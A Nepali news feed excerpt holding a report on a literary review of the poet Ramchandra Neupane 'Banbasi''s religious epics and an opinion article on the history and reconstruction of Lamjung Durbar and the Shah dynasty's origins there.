सो अवसरमा स्रष्टा आनन्द घिमिरेले २०४२ सालदेखिनै चिनजान भएको र त्यो बेलामा श्रृंगारिकमा डुब्नु भएको थियो ऐले धार्मिक साधनामा डुब्बु भएको पाएँ । उहाँको यो कोल्टे फेराई अपत्यारिलो लाग्छ तर त्यसलाई स्विकार्न कर लाग्छ, जसको साक्षी यी कृति नै छन् भन्नुभयो । उहाँले मान्छेले के गर्न हुन्छ के हुँदैन भन्ने थाहा पाएको छ तर पनि नकारात्मक काम गर्न उद्दत रहन्छ त्यसैले ज्ञान आवश्यक छ जसले आफैलाई परिवर्तन गर्न प्रेरित गर्छ भन्नुभयो । कविका कृतिले ज्ञान र भक्ति फरक हो भन्ने देखाएका छन् भन्दै उहाँले डि. श्रीप्रसाद घिमिरेद्वारा लिखित कल्पतरुको उदाहरण दिनु भयो र कर्मप्रति वफादार हुनुपर्छ भन्ने सन्देश कृतिमा रहेको उल्लेख गर्नु भयो ।
यसैगरी, बुद्धिजीवी बुद्धिसागर बरालले महाकाव्यको अध्ययन सहज छैन भन्नु हुँदै यो भएन त्यो भएन भन्नु समिक्षा हैन त्यसको विषयवस्तुका गुण दोष केलाउने क्षमता समिक्षकले राख्नु पर्छ भन्नुभयो । उहाँले कविको व्यक्तित्वमा समेत प्रकाश पार्नु भएको थियो ।
ती कृतिका लेखक, कवि एवम् धार्मिक ज्ञानक्रान्तिका अभियन्ता रामचन्द्र न्यौपाने ‘वनवासी’ले सबैकुरा जान्नका लागि चार दृष्टि खुल्लु पर्छ भन्नुहुँदै ज्ञानका चार तह हुन्छन् भन्नुभयो । तिनमा शिक्षा, स्वाध्याय, योग– अध्यात्म र तत्वज्ञान हुन् र तत्वज्ञानमा चारै ज्ञान समेटिएको हुन्छ । तत्वज्ञानको ज्ञाताले मात्र चारे तत्वको ज्ञान जान्दछ, यो भगवान्को अवतारबाट मात्र सम्भव छ उहाँले भन्नुभयो ।
उहाँले सत्य सनातन(भगवद्) धर्मको व्याख्या गर्ने क्रममा वेदको सारको रुपमा तीन सुत्रहरू फेला पर्छन् भन्नुहुँदै तीमध्ये कर्मकाण्डको उद्देश्य ‘असतोमा सद्गमय अर्थात खराब मार्ग छाडेर असलमार्गतिर लाग, योग तथा अध्यात्मको उद्देश्य तमसोर्मा ज्योतिर्गमय अर्थात अन्धकार छाडेर उज्यालोमार्गतर्फ लाग, र तत्वज्ञानको उद्देश्य मृत्योर्मा अमृतम् गमय अर्थात जन्म मृत्युको चोला छोडेर मुक्ति र अमरतातर्फ लाग्नु हुन् भन्नुभयो । यसको पनि सारको रुपमा ‘ऋते ज्ञानान्न मुक्ति’ अर्थात ज्ञान विना मुक्ति छैन भन्ने सुत्र प्रकट हुन्छ भन्ने उहाँले उल्लेख गर्नु भयो । यो महाकाव्यको उद्देश्य पढेर सबैको जीवन सफल सार्थक हुन सकोस् भन्ने छ उहाँले भन्नुभयो । कृति महाकाव्यको दृष्टिकोणले भन्दा ज्ञानको दृष्टिकोणले सबै धर्म ग्रन्थको सार र सबैभन्दा लाभदायक यो ग्रन्थलाई आफूले यो कृतिमा खोजिएको छ कविले उल्लेख गर्नुभयो । कृतिमा भएका पात्र ज्ञान प्रस्तुत गर्नका लागि खडा गरिएमा काल्पनिक पात्र हुन् उहाँले जानकारी दिनुभयो । अन्त्यमा, उहाँले भन्नुभयो सबैभन्दा ठूलो दानमा ‘ज्ञान दान’ रहेको उहाँले औल्याउनु हुँदै महत्वपूर्ण व्यक्तित्वहरू एवम् संस्थाहरूलाई प्रदान गरिएकोे हो भन्नुभयो ।
सो अवसरमा लमजुङे साहित्य समाजका अध्यक्ष तेजनारायण अधिकारीले कविसँग साहित्यिक यात्रा ५० को दशकबाट सुरु भएको स्मरण गर्दै यस्तो कार्यक्रमलाई बृहद सहभागितामा यस्तो समिक्षा कार्यक्रम गर्नु पर्ने सुझाव दिनुभयो ।
यसैगरी साहित्यकार बेन सुयलले कलम चल्दैमा सबै कवि नहुने र लेखिएका कविता सबै कविता हुँदैनन् भन्दै कवि न्यौपानेका रचना पढ्दा आनन्द दिन्छ भन्नुभयो । उहाँले ज्ञानक्रान्तिमा जीवन बदल्ने शक्ति र जीवनको शल्यक्रिया रहेको आफूले पाएको उल्लेख गर्नुभयो । अर्का साहित्यकार एवम् लक्ष्मीनारायण पुस्तकालका उपाध्यक्ष सुशीलचन्द्र अधिकारीले कवि र आफ्नो चिनजान ५० को दशकदेखिनै रहेको स्मरण गर्नु हुँदै उहाँका छन्द कविताले आफूलाई प्रेरणा दिने गरेको बताउनु भयो । उहाँजस्ता व्यक्तित्वको जिल्लामा सम्मान हुन नसकेको प्रति उहाँले दुखेसो व्यक्त गर्नु भएको थियो ।
यसैगरी, अर्का साहित्यकार बसन्त अधिकारीले नाम धेरै सुनेको तर प्रत्यक्ष भेट गर्ने अवसर नजुटेको उल्लेख गर्दै लमजुङ महोत्सव र यो कार्यक्रमले त्यो अवसर दिएको बताउनु भयो । ऐलेको भौतिव र उपभोक्तावादी समाजमा उहाँको कृतिले नयाँवन दिनेछ उहाँले भन्नुभयो ।
चन्द्रोदय माविका पूर्वप्रअ पुण्य खनियाले विद्यालयमा सहकार्य गर्दाका दिनको स्मरण गर्नु भयो । उहाँले उहाँले सरलशील स्वभावजस्तै लेखनी पनि उस्तै सन्देश मूलक हुने गरेका छन् । उहाँको काव्यमोह जीवन्त रहोस् भन्ने कामना खनियाले गर्नुभएको थियो ।
सो कार्यक्रमको अयोजक ठाडोभाका लोककला प्रतिष्ठान नेपालका अध्यक्ष नवराज पहाडीले कार्यक्रमको सञ्चालनका क्रममा आएका जिज्ञासाको समेत सम्बोधनको प्रयास गर्दै कविमा भएको सरलपनले आफूलाई स्तब्ध बनाउने गरेको बताउनु भयो । उहाँले यो कार्यक्रमलाई आध्यात्मिक चिन्तन गर्ने व्यक्तिहरूका माझमा गर्ने सोच थियो तर समयले त्यो मौका जुर्न सकेन तर पनि भोलिका दिनमा त्यस्तो प्रयास गरिने भन्ने जानकारी दिनु हुँदै यो अवसरका लागि कवि वनवासीप्रति कृतज्ञता व्यक्त गर्दै कार्यक्रममा सहभागी हुने सबैलाई धन्यवाद दिनु भएको थियो ।
उक्त अवसरमा कविको भक्ति सागरबाट ‘बिन्तिपत्र’ शीर्षकको कविता विद्याविकास आमाविका विद्यार्थी अपूर्वराज अधिकारीले वाचन गरेका थिए ।

]]>
https://www.antaranganews.com/?feed=rss2&p=23730 0
लमजुङ दरबार पुरातात्विक सम्पदा https://www.antaranganews.com/?p=18579 https://www.antaranganews.com/?p=18579#respond Mon, 11 Sep 2023 02:31:33 +0000 https://www.antaranganews.com/?p=18579 सोह्रौं शताब्दीमा निर्माण भएको लमजुङ दरबार नेपालकै पुरानो दरबार हो । बाइसे चौबीसे राज्य अस्तित्वमा रहेका बेला गोरखा दरबार, पाल्पा दरबार, नुवाकोट दरबार, भक्तपुर दरबार जस्तै यो दरबार बनेको थियो । शासक र राज्य व्यवस्था फेरिएसँगै पुराना दरबारहरूको महत्व घट्दै गयो । मुलुककै पुरानो मानिएको बेसीशहर नगरपालिका– ३ गाउँशहरमा रहेको लमजुङ दरबार पुरातात्विक विभागले पुनःनिमार्ण गर्न लागेको छ । लमजुङ गाउँशहरको दरवार ऐतिहासिक एवम् पुरातात्विक सम्पदा हो । ऐतिहासिक गाउँशहर दरबार, लमजुङ कालिका मन्दिर र सो क्षेत्रमा रहेका सम्पदाको संरक्षण गर्नु पर्दछ ।
शाहवंशीय शासनको उदगमथलो हो लमजुङ । त्यसैको विरासत हो लमजुङ दरबार । कास्कीकोटका राजा कुलमण्डलका माइला छोरा कालु शाहलाई विसं १५४० मा लमजुङका खजेदुरा, सुकराम क्याउसा, माघे दुरा, कुश्माखर घिमिरे, लक्ष्मण दुराले लमजुङको पहिलो चौबीसे राज्यका राजा बनाएका थिए । इतिहासमा कुलमण्डल भारतको चितोरगढका राजा मुश्लिमहरूको आक्रमणबाट बच्न भुपाल तथा उनका छोरा नेपाल तिर पसेका थिए । चितोरगढका राजा नेपालको रिडी हुँदै लिङ्खुमा पुगेर बस्न थाले । उनका हरिहरसिंह र अजयसिंह नाम गरेका दुई छोराहरू जन्मिए । यी दुईको नाम खाञ्चाखान र मिचाखान थियो । खाञ्चाखान ढोडमा गए र त्यहाँबाट भीरकोट, सतहु र गह्ररौंलाई आफ्नो कब्जामा लिए । कान्छो भाइ मिचाखान पहिले स्याङ्जाको नुवाकोटमा गएर राज्य गर्न थाले कान्छा भाइ मिचाखानबाट विचित्र खान र कुलमन्डन खानको जन्म भयो । कुलमन्डनले दिल्लीका बादशाहबाट शाह पदवी पाएकाले उनको पालादेखि राजवंशले आफ्नो नामको पछाडि शाह लेख्न थाले ।
कालु शाहलाई लमजुङको राजा बनाए र शाहवंशीय राजपरम्परा सुरु गरका थिए । तर कालु शाहलाई लमजुङको राजा भएको कुरा घले जातिलाई मन परेको थिएन । कालु शाहले शासन गर्दा घेर्मु र घलेगाउँ क्षेत्र घले राजाबाट शासित थियो । घलेराजा र कालु शाहाका सेनाहरू बिच बेला बखत बिवाद भइरहन्थ्यो । विवाद बढदै जाँदा घलेहरूले शिकार खेल्ने बहानामा जंगलमा लगेर मृग मार्ने बहाना गरी कालु शाहलाई वाण प्रहार गरेर मारिदिए । लमजुङ फेरी घले शासनभित्र फर्कियो ।
कालु शाहको हत्याको घटनापछि खजेदुरा, सुकराम क्याउसा, कुश्माखर घिमिरे, लक्ष्मण दुरालहरूले नै कुलमण्डलका कान्छा छोरा यशोबह्म शाहलाई पुनः दोस्रो पटक कास्कीबाट ल्याएर राजा बनाएका थिए । यशोबह्म शाहलाई सुरुमै पुरानकोट दरबार लैजान अनुकूल नदेखि पहिला दुराडाँडामा राखिएको थियो । तर ज्योतिषी कुश्माखरले साइत हेर्दा राजा बनाउने उत्तम साइत टर्न लागेको देखिँदा यशोब्रह्म शाहलाई नजिकै(तुर्लुङकोट, भागु)को चेप्टो ठूलो ढुङ्गा माथि राखी सिन्दुर जात्रा गरी विसं १५५० असार १५ गते गरी राजा घोषणा गरिएको थियो । (त्यो स्थान आजका दिनमा पनि सिन्दूरे ढुंगाका नामले प्रचलित छ । तत्कालीन गाविसको नाम समेत सोही आधारमा सिन्दूरे राखिएको थिया ।) त्यसपछि मात्र यशोब्रह्म शाहलाई पुरानकोट दरबारमा भित्र्याइएको थियो ।
शाहवंश आउनुअघि घलेराजाले लमजुङको राजकाज चलाएका थिए । घले राजाको राजधानी क्व्होलासोंथारको पतन भएपछि खजे घले तुर्लुङमा गएर नयाँ कोट स्थापना गरी घलेबाट दुराको उपनामबाट स्वतन्त्र रुपमा रजाइँ गरेर बसेका थिए । खजे दुरालाई दाजुको राज्य विस्तारको अभियान मन परेको थिएन । त्यसैले, चिसंकुका घिमिरे बाहुनहरूसंग मिलेर कालु शाहलाई तुर्लुङकोटमा आफ्नो स्थानमा राजा बनाएका थिए । यशोब्रम्हा शाहलाई राजा घोषणा गरेर सिन्दूर जात्रा गरिएको ढुङ्गालाई सिन्दुरे ढुङ्गा भनिन्छ । ठूलोस्वाँरा गाउँ र तुर्लुङकोट गाउँको बीचमा पर्ने डाँडामा सिन्दुरे ढुङ्गा रहेको छ । सिन्दुरे ढुङ्गालाई दुरा समुदायले संरक्षण गरेर राखेका छन् । इतिहाससँग जोडिएको नायकको रुपमा रहेको खजे दुराको स्मृतिमा पार्कसमेत बनाइएको छ । दुराडाँडाको चियानपाटामा रहेको यस पार्कमा खजे दुराको सालिक पनि बनाइएको छ । दुराहरूको तत्कालीन शासनसँगको सम्बन्ध रहेको तुर्लुङकोट गाउँ माथि तीन वटा गढीहरू छन् । यी गढीहरू तत्कालीन बाइसे चौबिसे राज्यकालमा लमजुङ राज्यको दक्षिणी भागको सुरक्षा जिम्मेवारी पाएका दुराहरूले बनाएका हुन् ।
यशोब्रम्ह शाह लमजुङका राजा भए पनि दाजु कालु शाह मारिए झैं आफू पनि मारिने हो कि ? भन्ने त्राश थियो । तर यशोब्रम्ह शाहले ल्होचन गुरुङसँग मित लगाइ कविक्याल, सवक्याल, पुरुक्याल र कोकिल गुरुङलाई हात लिएर पोंजो भन्ने ठाउँमा घलेका सन्तानलाई मास्न लगाए । त्यसरी मद्दत गर्ने ल्होचन र दुरालाई राजा यशोब्रम्ह शाहले हले, पाटे, कोदाले, त्रिशाली, पञ्चसाली खोरिया फाँड्ने र शिकार गर्ने च्यांग्रा पाल्ने र व्यापार गर्ने सहुलियत प्रदान गरे । राजा यशोब्रम्ह शाहले तुर्लुङकोट र पुरानोडाँडामा राजमुकाम पनि गराएका थिए । अहिले पनि ती ठाउँहरूमा पुरानाकिल्ला र घरका अवशेषहरू देख्न सकिन्छ ।
यशोबह्म शाहको शासनकालमा भद्र, शान्त तथा इमान्दार जातिको रुपमा चिनिने मगर जातिलाई राजदरवारको सेवामा राखिएको थियो । त्यसैले मगर भाषा एवं भेषभुषा र संस्कृतिको सामान्य प्रभाव राजदरवार परेको थियो । लमजुङ शब्द मगर भाषाबाट आएको मानिन्छ । लमजुङ शब्द लम र जुङ मिलि बनेको पाइन्छ । मगर भाषामा लमको अर्थ अग्लो, लामो र ठूलो तथा जुङको अर्थ पहाड पर्वत भएको भूमि भन्ने हुन्छ । लमजुङ शब्दले अग्ला, लामा तथा ठूला पहाड पर्वतहरूले बनेको भूमि भन्ने बुझिन्छ ।
यशोब्रम्ह शाहले गाउँहशहरमा कालिकामन्दिर, गोरखनाथ गुफा, दरबार, किल्ला, चौतारी, सिंढी र धर्मपानी निर्माण गर्न लगायको इतिहास छ । यशोब्रम्ह शाहले गाउँशहरमा गर्मीको राजधानी र बेसीशहर जाडोको राजधानी बनाएका हुन । वि.सं. १५९८ मा उनले लमजुङमा तोप ढाल्न लगाई सैनिकलाई मजबुती गराएका थिए । राजा यशोब्रम्ह शाहका नरहरि शाह र द्रव्य शाह २ छोरा थिए । कालु शाहका छोरा नरपति शाहलाई राजा यशोब्रम्हले लमजुङको उत्तरतिरका चार गाउँको अक्तियारी दिएका थिए । पछि नरहरि शाह विरुद्ध लागेकाले नरपति मारिएका थिए । यशोबह्म शाहको मृत्युपछि उनका जेठा छोरा नरहरि शाह विसं १५९८ मा राजा भए । उनी पछि क्रमशः चुडा शाह १६४५, अचित शाह १६६२, नरेन्द्र शाह १६९३, हरि नारायण शाह १७३३, भीम शाह १७९४, रिपुमर्दन शाह १७९८ र वीरमर्दन शाह १८०२– १८३९ गरी नौ पुस्ताले लमजुङ दरबारबाट शासन चलाएका थिए । लमजुङका अन्तिम राजा वीर शाह थिए । वि.सं १८३९ कार्तिक १९ गतेसम्म शाहवंशले लमजुङ दरबारमा शासन चलाएका थिए । इतिहासमा खासगरी लमजुङको शाहवंशीय शासन कालको इतिहासलाई हेर्दा लडाकु र साहसी राज्यको रुपमा लमजुङलाई लिइएको पाइन्छ । त्यो समयमा स्याङ्जालाई सिकारी, लमजुङलाई गरुढ, गोरखालाई सर्प र कास्कीलाई भ्यागुताको रुपमा इतिहासमा पढन पाइन्छ ।
नरहरि राजा भएका बेला यशोबह्माका छोराहरू झगडामा उत्रिएपछि कान्छो छोरा द्रब्य शाह राइनासकोटको गोठमा बस्न गए । पछि द्रब्य शाहले १६१६ सालतिर गोरखाको लिगलिगकोटको दौड जितेपछि लिगलिगकोट र माझकोट कब्जा गरी गोरखा राज्य खडा गरी राजा भए । द्रव्य शाहले आफ्नो बाहुबल र गोरखाका भारदारहरूको सहायताबाट गोरखा राज्यको स्थापना गरेका थिए । यसबाट उनका दाजु नरहरि शाहलाई इष्र्या भयो । उनले भाइ द्रव्य शाहले मेरै सरदारको रुपमा गोरखा विजय गरेकाले गोरखा माथि लमजुङकै अधिकार हुन्छ भनी खिचलो उठाए । द्रव्य शाह भने आफूले ठूलो कठिनाइका साथ स्थापना गरेको गोरखा राज्यलाई लमजुङमा गाभ्ने पक्षमा थिएनन् । यसबाट नरहरि शाह र द्रव्य शाह बीच विवाद बढ्यो र आपसमा ठूलो शत्रुता भयो । यसपछि लमजुङले द्रव्य शाहको हत्या गर्ने र गोरखा माथि आक्रमण गर्ने लगायतका योजनाहरू बनाइ पटक पटक प्रयास गर्यो तर सफलता भएन । यसै विवादका कारण गोरखा र लमजुङ बीच पछिसम्म पनि शत्रुता थियो । धेरै पटक दाजु भाइको बिचमा झगडा हुदा आमा बसन्तावतीले चेपे नदीमा आफ्नो दुधको धारा बगाउँदै सीमा कायम गरिदिइन ।
तत्कालीन शासनकालका थुप्रै ऐतिहासिक उतारचढावको साक्षीका रुपमा रहेको लमजुङ दरबार विसं २०७२ वैशाख १२ गतेको विनाशकारी भूकम्पले दरबारको पुतली गारो लगायत अन्य भागमा क्षति पु¥यायो । बि.स. १५५० सालमा यशोब्रह शाहको पालामा निमार्ण गरिएको लमजुङ दरवार १८२० मा पुनः निर्माण गरिएको थियो । त्यसपश्चात १९९० को भुकम्प पश्चात १०९२ मा जीर्णोउद्धार गरिएको थियो । दरवार २०४६ सालमा पनि पुनः र्निमार्ण भएको थियो । अहिले पुरातत्व विभागले जीर्ण अवस्थामा रहेको लमजुङ दरबारको पुनः निमार्ण कार्य सुरु गरेको छ ।
पुरातत्व विभाग नेपालको प्राचीन ऐतिहासिक, साँस्कृतिक र पुरातात्विक सम्पदाको लेखाजोखा, वर्गीकरण तथा संरक्षणका लागि काम गर्ने सरकारी निकाय हो । लमजुङमा भएका जे जति सम्पदाहरू छन् यी सबै राष्ट्रका गहना र पहिचान हुन् । लमजुङ दरबारको कालीका मन्दिरमा क्षमा पूजा गरि दरबार पुनः निर्माण गर्न भत्काइएको छ । मन्दिरमा रहेका महेश्वर, विष्णु, ब्रह्म, महाकाली, महासरस्वती र महालक्ष्मी लगायतका देवी देवताको मूर्ति नयाँ भवनमा क्षमा पूजा गरि सारिएको छ । दरबारको पुनः निमार्ण कार्य गरिदा पुरानै स्वरुपमा इँटा, ढुंगा, काठ र दरवारको छाना तामाको हुनेछ ।
लमजुङ दरबार परिसरमा उदिपुरमा रहेको श्रीजंग गणले यशोबह्मा शाहको शालिक निर्माण गरिएको छ । लमजुङ दरबारको शिरमा पुरानोकोट गढी रहेको छ । पुरानोकोट गढी क्षेत्रमा घरबस्तीका भग्नावशेष, मठमन्दिर, त्यतिबेला प्रयोग गरेका ढिंकीको ओखल, जातो, सिलौटो जस्ता सामग्रीहरू अहिले पनि देख्न पाइन्छ । ती ऐतिहासिक वस्तुहरूको पनि संरक्षण गर्न पर्दछ । मन्दिरहरू, ढिंकी, जातो र राजाका सेनाहरूले सुरक्षा दिने भवनहरू यतिबेला भग्नाबेश अवस्थामा रहेका छन् । लमजुङ दरबारमा रहेको कालिका मन्दिरमा वर्षभरि पूजा हुने भए पनि मुख्यतया वर्षको दुई पटक पूजापाठ हुँदै आएको छ । चैते दशैंको घटस्थापनादेखि अष्टमीसम्म र वडादशैं घटस्थापनादेखि दशमीसम्म पूजापाठसँगै यहाँ ठूलो मेला समेत लाग्ने गर्दछ । कालिकालाई सरकारी बली पनि दिने गरिन्छ । करीव १६ रोपनी क्षेत्रफलमा लमजुङ दरबार रहेको छ ।
लमजुङको पाँचसय बर्ष पहिलेको इतिहासमा आधिकारिक रुपमा लेखिएको पाइदैन तर पनि लमजुङको उत्तर तथा उत्तर पश्चिका लेकाली डाँडाकाँडामा पशुपालन व्यवसायको विकास गरी प्राचीन कालदेखि वसोवास गर्दै आएका गुरुङ तथा घले जातिहरू हुन । लमजुङमा एउटा गाउँपालिकाको नाम क्व्होलासोथार छ । क्व्होलासोथारको शाब्दिक अर्थ ‘आदिम थलो’ हुन्छ । अर्थात गुरुङ र घले जातिहरूको त्यो क्षेत्र जस्तै अहिलेको घलेगाउँ राजधानी थियो भने भुजुङ, उपल्लो घनपोखरा, तल्लो घनपोखरा, नायँु, लामागाउँ, कपुरगाउँ, रापासिँ, नजरे, मालिङ, पुमा, बिम्दा र नाल्मा घले राज्यका क्षेत्रमा पर्ने गाउँहरू थिए । घले राजाको शासनकालको बारेमा लिखित दस्ताबेजहरू नभए पनि तमुहरूको आदिम राजधानी क्व्होलासोथारमा थियो ।
गोरखाको लिगलिगकोट लमजुङको गाउँशहर आउन द्रव्य शाहका सेनाहरूलाई चेपे तरेपछि साइलीटार हुँदै प्याराजुङ, भार्ते भएर दोर्दी खाोला तरि रामचोक बेसीको बाटो हिड्ने गर्दथिए । आफ्नो राज्यसंग लड्न द्रव्य शाहका सेनालाई टाढाबाट नै देख्न सकियोस भनेर नरहरि शाहले चिती रामचोकमा निशान कालिकागढी निर्माण गर्न लगाएका थिए । पछि उदिपुरको कालिका मन्दिर पनि नरहरि शाहकै पालामा निर्माण भएको थियो । स्थापना कालमै दुबै मन्दिरको पुजाआजा चलाउन गुठीको ब्यवस्था पनि नरहरि शाहले नै गरेका थिए । नरहरि शाहले बेसीशहरको, कर्पुटारको, भोर्लेटारको र भोटेओडारको राजकुलो निर्माण गराएका थिए । लमजुङ कोटमा कचरीघर, पूजाकोठा, अखण्ड दीपकोठा, दशैंघर आदि पनि नरहरि शाहले नै निर्माण गराएका थिए ।
राजा रिपुमर्दन शाहले आफ्नो शासनकालमा लमजुङलाई शासन गर्न सजिलो होस भनी २७ मौजामा अर्थात प्रशासनिक क्षेत्रमा विभाजन गरेका थिए । जसमा रजस्थल, राजा बस्ने ठाउँ राजधानी वा गौंडा निर्माण गरेको ठाउँ । सराञ्चोक, राजाका सिपाहीले सरायँ खेल्ने ठाउँ । चौथर, गौंडाकोट भनी राज्यले सैनिक । नौथर, बाह्रथर, लमजुङको फौज बस्ने र तालिम गर्ने ठाउँ । चिती, राजाको चिताईदारहरूलाई बसोबास गर्न खटाइएको ठाउँ । पृथ्वीनारायण शाहले बाइसे चौबीसे राज्यलाई एक पछि अर्को गरी गाभेर राज्य विस्तार गर्दा पनि लमजुङ भने स्वतन्त्र रहेको थियो । गोरखा र लमजुङको तार्कुघाटमा लडाइँ हुँदा लमजुङ हारेपछि वि.सं १८३९ मा राजेन्द्र लक्ष्मी शाहको पालामा लमजुङ नेपाल राज्यमा गाभिएको हो । २१ भाद्र, २०८० दाङ ।
(लेखक : स्वतन्त्र पत्रकार संघको निवर्तमान राष्ट्रिय अध्यक्ष हुनुहुन्छ । – सं.)

]]>
https://www.antaranganews.com/?feed=rss2&p=18579 0